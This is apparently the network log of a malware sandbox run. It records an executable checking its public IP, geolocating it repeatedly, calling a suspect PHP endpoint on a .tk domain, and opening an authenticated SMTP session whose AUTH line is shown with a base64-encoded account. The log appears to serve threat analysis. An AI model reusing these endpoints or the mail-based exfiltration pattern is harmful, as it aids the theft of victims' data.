                                                                    Apr 8, 2024 10:03:07.132369995 CEST324INHTTP/1.1 200 OK
                                                                    Date: Mon, 08 Apr 2024 08:03:07 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 107
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: ac57f9de25682267cf7eef760e7f58ad
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.549718193.122.6.168803648C:\Users\user\Desktop\Zarefy4bOs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 8, 2024 10:03:07.931536913 CEST151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Apr 8, 2024 10:03:08.475114107 CEST324INHTTP/1.1 200 OK
                                                                    Date: Mon, 08 Apr 2024 08:03:08 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 107
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 0e8e72126ee3c44bd1c7f3fa8d43ebb0
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 102.129.152.231</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.549706104.21.67.1524433648C:\Users\user\Desktop\Zarefy4bOs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-04-08 08:02:59 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    Connection: Keep-Alive
                                                                    2024-04-08 08:02:59 UTC710INHTTP/1.1 200 OK
                                                                    Date: Mon, 08 Apr 2024 08:02:59 GMT
                                                                    Content-Type: application/xml
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    access-control-allow-origin: *
                                                                    vary: Accept-Encoding
                                                                    Cache-Control: max-age=86400
                                                                    CF-Cache-Status: HIT
                                                                    Age: 65280
                                                                    Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Jr12qL%2Fz3YGWSuzorSDg2Kq%2BBGO5tfztFDLj26qf4EZxzXRixV7A%2BD%2Fui6ET2GBR5EelpVX5sq3Z3Q1GuNp8J8%2Bvq8DsCLce4vCoxxFBiMv84kdCwrD6rOPwwbnP20zbPIglfDG"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8710bcffefe89abd-MIA
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2024-04-08 08:02:59 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                    Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                    2024-04-08 08:02:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.549707104.21.67.1524433648C:\Users\user\Desktop\Zarefy4bOs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-04-08 08:02:59 UTC64OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    2024-04-08 08:03:00 UTC702INHTTP/1.1 200 OK
                                                                    Date: Mon, 08 Apr 2024 08:03:00 GMT
                                                                    Content-Type: application/xml
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    access-control-allow-origin: *
                                                                    vary: Accept-Encoding
                                                                    Cache-Control: max-age=86400
                                                                    CF-Cache-Status: HIT
                                                                    Age: 65281
                                                                    Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pwydnQ2T5D37KxLjRbFk64Xp%2Bi1V1KgoUQAofghFCin707ujYRO3gp6XOmkXVf2U8MkHWNcTka7RysbwMPKX3gzPEOdvl6zVSEEOh7T70Y8DN1Ob67nhGUWJGWx4IDu7bbD8Abaa"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8710bd050c1f12a7-MIA
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2024-04-08 08:03:00 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                    Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                    2024-04-08 08:03:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.549709104.21.67.1524433648C:\Users\user\Desktop\Zarefy4bOs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-04-08 08:03:00 UTC64OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    2024-04-08 08:03:01 UTC708INHTTP/1.1 200 OK
                                                                    Date: Mon, 08 Apr 2024 08:03:01 GMT
                                                                    Content-Type: application/xml
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    access-control-allow-origin: *
                                                                    vary: Accept-Encoding
                                                                    Cache-Control: max-age=86400
                                                                    CF-Cache-Status: HIT
                                                                    Age: 65282
                                                                    Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b0JhGYKnYKC3adAoMBYl5esS7AC43Bx2EsIcZP%2F4h6xX9CFun4D8SAS2qSjgpzEVhkWpLLpt7qaMPxhfCYjL03J%2Fu4teyMn%2FT0P0v9s2P4Lnu2oir%2FNIf7hYpQ7yKAnSebyZeTKA"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8710bd0b8ad6a51b-MIA
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2024-04-08 08:03:01 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                    Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                    2024-04-08 08:03:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.549711104.21.67.1524433648C:\Users\user\Desktop\Zarefy4bOs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-04-08 08:03:01 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    Connection: Keep-Alive
                                                                    2024-04-08 08:03:02 UTC712INHTTP/1.1 200 OK
                                                                    Date: Mon, 08 Apr 2024 08:03:02 GMT
                                                                    Content-Type: application/xml
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    access-control-allow-origin: *
                                                                    vary: Accept-Encoding
                                                                    Cache-Control: max-age=86400
                                                                    CF-Cache-Status: HIT
                                                                    Age: 65283
                                                                    Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P7xH5so9MvwKBeZ7omAd5Gff%2ByHPkUSJa%2FUFKdJt0RLvpRdhQ2u%2FcqlV%2Bu1mPGYbrJE5YQGzSaRDR%2BjRZB513uewNTZsyjGo8Jk5%2BvAOlpzpfnfFZh72PEpqJliVFadxCpGuW8fG"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8710bd121ab57471-MIA
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2024-04-08 08:03:02 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                    Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                    2024-04-08 08:03:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.549713104.21.67.1524433648C:\Users\user\Desktop\Zarefy4bOs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-04-08 08:03:02 UTC64OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    2024-04-08 08:03:03 UTC708INHTTP/1.1 200 OK
                                                                    Date: Mon, 08 Apr 2024 08:03:03 GMT
                                                                    Content-Type: application/xml
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    access-control-allow-origin: *
                                                                    vary: Accept-Encoding
                                                                    Cache-Control: max-age=86400
                                                                    CF-Cache-Status: HIT
                                                                    Age: 65284
                                                                    Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F9e69OuAAWs3hzXocQhHhDSRkfEhibu%2BtjGCRtn5trrwCLqSNDWmdNj1T8YI6Hl2CPigjluuLe%2Fd7AP1IBPFgbKwUFY3A3nqI1zCceWygDL50hpnD4EUpDTFpaNym5W2Wco8ZO3%2B"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8710bd189b2c9add-MIA
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2024-04-08 08:03:03 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                    Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                    2024-04-08 08:03:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.549715104.21.67.1524433648C:\Users\user\Desktop\Zarefy4bOs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-04-08 08:03:04 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    Connection: Keep-Alive
                                                                    2024-04-08 08:03:05 UTC702INHTTP/1.1 200 OK
                                                                    Date: Mon, 08 Apr 2024 08:03:05 GMT
                                                                    Content-Type: application/xml
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    access-control-allow-origin: *
                                                                    vary: Accept-Encoding
                                                                    Cache-Control: max-age=86400
                                                                    CF-Cache-Status: HIT
                                                                    Age: 65286
                                                                    Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6VLTWaQCmGKgGlb0VH5n7GQi66DDmFFxe0wYIAS4Lz8ZRl4YR9fShSX4CRoAmaxf4heTP5QQgNaRsuD7YSVFEe5BaxcciUnpYGAOazTT0YEfNwU7v7HBUz3JMDhGmaYOZ42ek2G%2F"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8710bd2569af8756-MIA
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2024-04-08 08:03:05 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                    Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                    2024-04-08 08:03:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.549717104.21.67.1524433648C:\Users\user\Desktop\Zarefy4bOs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-04-08 08:03:07 UTC64OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    2024-04-08 08:03:07 UTC712INHTTP/1.1 200 OK
                                                                    Date: Mon, 08 Apr 2024 08:03:07 GMT
                                                                    Content-Type: application/xml
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    access-control-allow-origin: *
                                                                    vary: Accept-Encoding
                                                                    Cache-Control: max-age=86400
                                                                    CF-Cache-Status: HIT
                                                                    Age: 65288
                                                                    Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JxHGXkGou5u6PulcD0Jl%2FbTuJhCHPUXSe0v3Fj8vvS4o9Gp8FjdI9tyt%2Bh2XEAN9kUbAc7Fe9%2BWC9K8YXBo%2FNI0866XbS3fKgeoJei7CnzANZda2wI%2FE5oh7zF%2Fv65IAePcG5wh8"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8710bd3499c78750-MIA
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2024-04-08 08:03:07 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                    Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                    2024-04-08 08:03:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.549719104.21.67.1524433648C:\Users\user\Desktop\Zarefy4bOs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-04-08 08:03:08 UTC88OUTGET /xml/102.129.152.231 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    Connection: Keep-Alive
                                                                    2024-04-08 08:03:09 UTC708INHTTP/1.1 200 OK
                                                                    Date: Mon, 08 Apr 2024 08:03:08 GMT
                                                                    Content-Type: application/xml
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    access-control-allow-origin: *
                                                                    vary: Accept-Encoding
                                                                    Cache-Control: max-age=86400
                                                                    CF-Cache-Status: HIT
                                                                    Age: 65289
                                                                    Last-Modified: Sun, 07 Apr 2024 13:54:59 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bbOEe78NdfRyCnvSz6cXpvseW0PmHWLYUpQerdGYwAZ%2FepnljiwHqYomMoTeWHzKSAmqfCx0AhneGukVZMmvkaUSoRNspsYZu%2BEczWgIRYLULw%2Fe8n2G6A2LSaWSH4%2BWqUISezv0"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8710bd3cff3d4c1a-MIA
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2024-04-08 08:03:09 UTC380INData Raw: 31 37 35 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 43 41 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 43 61 6c 69 66 6f 72 6e 69 61 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4c 6f 73 20 41 6e 67 65 6c 65 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 39 30 30 30 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4c 6f 73
                                                                    Data Ascii: 175<Response><IP>102.129.152.231</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>CA</RegionCode><RegionName>California</RegionName><City>Los Angeles</City><ZipCode>90009</ZipCode><TimeZone>America/Los
                                                                    2024-04-08 08:03:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.549720104.21.27.854433648C:\Users\user\Desktop\Zarefy4bOs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-04-08 08:03:09 UTC79OUTGET /_send_.php?TS HTTP/1.1
                                                                    Host: scratchdreams.tk
                                                                    Connection: Keep-Alive
                                                                    2024-04-08 08:03:40 UTC739INHTTP/1.1 522
                                                                    Date: Mon, 08 Apr 2024 08:03:40 GMT
                                                                    Content-Type: text/plain; charset=UTF-8
                                                                    Content-Length: 15
                                                                    Connection: close
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jOn3KALFHUXeTf%2Bh8PolcgCiew0eOdW7SU6GeBQuXcXnucdhiGDrygvp0uB7t5rU3CVv%2BuncldQL2By8XB5jJ8XJvPBqW%2BRrfvJeQg2PKAE%2BJwlvVV4TVjyL41mPMQUk%2BiEH"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    Referrer-Policy: same-origin
                                                                    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 8710bd430b9cb3e3-MIA
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2024-04-08 08:03:40 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                                    Data Ascii: error code: 522


                                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                                    Apr 8, 2024 10:03:47.095187902 CEST58749728208.91.199.225192.168.2.5220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                    Apr 8, 2024 10:03:47.361692905 CEST49728587192.168.2.5208.91.199.225EHLO 138727
                                                                    Apr 8, 2024 10:03:47.558579922 CEST58749728208.91.199.225192.168.2.5250-us2.outbound.mailhostbox.com
                                                                    250-PIPELINING
                                                                    250-SIZE 41648128
                                                                    250-VRFY
                                                                    250-ETRN
                                                                    250-STARTTLS
                                                                    250-AUTH PLAIN LOGIN
                                                                    250-AUTH=PLAIN LOGIN
                                                                    250-ENHANCEDSTATUSCODES
                                                                    250-8BITMIME
                                                                    250-DSN
                                                                    250 CHUNKING
                                                                    Apr 8, 2024 10:03:47.562429905 CEST49728587192.168.2.5208.91.199.225AUTH login dHNsb2dzQG1rc2lpbXN0LmNvbQ==
